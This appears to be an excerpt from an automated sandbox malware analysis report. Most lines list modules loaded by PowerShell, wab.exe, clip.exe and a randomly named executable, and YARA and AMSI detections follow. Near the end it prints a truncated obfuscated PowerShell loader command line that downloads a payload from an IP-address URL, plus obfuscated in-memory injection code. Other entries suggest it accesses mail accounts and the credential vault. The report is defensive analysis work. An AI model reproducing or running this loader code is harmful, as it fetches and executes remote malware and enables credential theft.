              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: ieframe.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: netapi32.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: mlang.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: winsqlite3.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: vaultcli.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeSection loaded: wininet.dll
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeSection loaded: mswsock.dll
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeSection loaded: fwpuclnt.dll
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeSection loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: actxprxy.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\msftedit.dll
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: Binary string: lambda_methodCore.pdb5 source: powershell.exe, 00000006.00000002.2507983794.0000000008320000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000018.00000002.2966794524.00000000088BC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2508311915.000000000837F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: wab.exe
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbT source: powershell.exe, 00000006.00000002.2505588191.00000000072DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5l@ source: powershell.exe, 00000006.00000002.2505588191.0000000007251000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 0000001B.00000002.3098293676.0000000003B17000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2511671395.000000000A87F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2970941150.000000000A1F7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3408936789.000000000486F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2508655115.00000000085D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2970578601.0000000008DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2944964095.0000000005F67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.3371615882.0000000005BA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2669451040.0000024A52932000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Jede)$global:irrestrainably = [System.Text.Encoding]::ASCII.GetString($eternitfabrikken)$global:Arbejdsgiverforenings=$irrestrainably.substring($Exaltee,$Umyndiges)<#Nonsilicious Odo
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((stikpropperne $Tollbooths $Lactosid), (Boligudvalg @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Zoroastra = [AppDomain]::CurrentDomain.GetAssemblies()$g
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Whorled)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Istandsatte, $false).DefineType($Nonproliferous,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Jede)$global:irrestrainably = [System.Text.Encoding]::ASCII.GetString($eternitfabrikken)$global:Arbejdsgiverforenings=$irrestrainably.substring($Exaltee,$Umyndiges)<#Nonsilicious Odo
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Behandlingsform)$global:Buldret = [System.Text.Encoding]::ASCII.GetString($Embosom)$global:Brevicauda2=$Buldret.substring($Sycophant,$Fanhouse)<#Andestegs Ulykkers Ejende Blafren Tas
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Gteskabsbruddenes $lesses $Altereres), (Anspndende @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Outstations = [AppDomain]::CurrentDomain.GetAssemblies()
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Restraighten)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Constantin, $false).DefineType($blindcat, $S
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Behandlingsform)$global:Buldret = [System.Text.Encoding]::ASCII.GetString($Embosom)$global:Brevicauda2=$Buldret.substring($Sycophant,$Fanhouse)<#Andestegs Ulykkers Ejende Blafren Tas
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,regenteaC erudNdlideSt.n
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,
